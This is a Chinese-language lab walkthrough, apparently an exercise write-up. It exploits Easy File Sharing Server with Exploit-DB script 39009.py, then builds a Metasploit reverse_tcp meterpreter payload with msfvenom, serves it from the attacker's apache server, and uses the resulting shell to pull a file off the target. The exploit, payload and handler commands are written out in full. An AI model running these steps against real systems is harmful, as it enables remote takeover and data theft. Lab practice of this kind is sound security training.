一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
先在靶机中安装efssetup_20181,并找到靶机的IP地址:
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
使用kali的nmap工具扫描靶机,发现运行了easy file sharing服务:
查找出和easy file sharing服务相关的漏洞:
输入指令:
searchsploit easy file sharing
得到结果:
3、利用该漏洞,使得靶机运行计算器。
利用此漏洞:
其所在位置为:
这是一个远程溢出漏洞,利用它可以在靶机上执行计算器程序。
使用该命令执行脚本:
输入指令:
python /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机IP 80
回到靶机可以发现计算器已经运行:
二、Metasploit应用
使用msfvenom指令生成被控端程序,参数lhost的值即为自己的kali主机的IP地址:
输入指令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali主机IP lport=5000 -f exe -o /root/payload.exe
生成的文件可以在这里找到:
使用命令启动Metasploit:
msfconsole
按顺序输入以下命令设置并启动主控端,然后等待靶机上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost kali的IP
set lport 5000
exploit
将payload文件传入靶机:
这里有两种方法将文件传入靶机,一是直接复制进去,不过这种方法在实际的渗透过程中并不现实,所以介绍第二种方法:
输入指令 ‘cd’ 进入root文件夹,输入指令 ‘ls’ 可以看见 payload.exe 在该目录下:
cd/root
输入指令 ‘cp’ 复制 payload.exe 文件,然后启动apache2,把kali变成一个服务器(他人可以访问你的kali,下载文件),并把payload.exe文件改成名为1.exe放到网上:
cp ./payload.exe/var/www/html/1.exe
service apache2 start
service apache2 status
打开靶机,输入网址:kali的IP/1.exe,下载1.exe文件并运行:
此时靶机已上线,输入命令 ‘ls’ 查看靶机的桌面都有什么文件(当然也可以输入指令 ‘cd’ 进入任意文件夹,例如进入C盘):
这里我们打算下载它在桌面的名为 ‘1.txt’ 的文件(上图白底一行),输入指令 download 1.txt(要下载的文件名) var(文件的保存路径) :
例如下载 1.txt这个文件:
download 1.txt var
显示已经下载成功:
进入到文件的保存位置:
打开该文件:
再进入到靶机确认是否是所下载的文件:
显然内容是一样的,证明操作是成功有效的